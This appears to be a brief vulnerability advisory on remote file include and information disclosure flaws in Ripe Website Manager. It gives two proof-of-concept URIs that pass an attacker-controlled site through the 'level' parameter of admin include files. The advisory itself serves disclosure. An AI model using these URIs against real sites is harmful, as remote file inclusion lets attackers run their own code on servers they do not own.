Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities

Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path to ripe]/admin/includes/author_panel_header.php?level=attacker site
http://www.example.com/[path to ripe]/admin/includes/admin_header.php?level=attacker site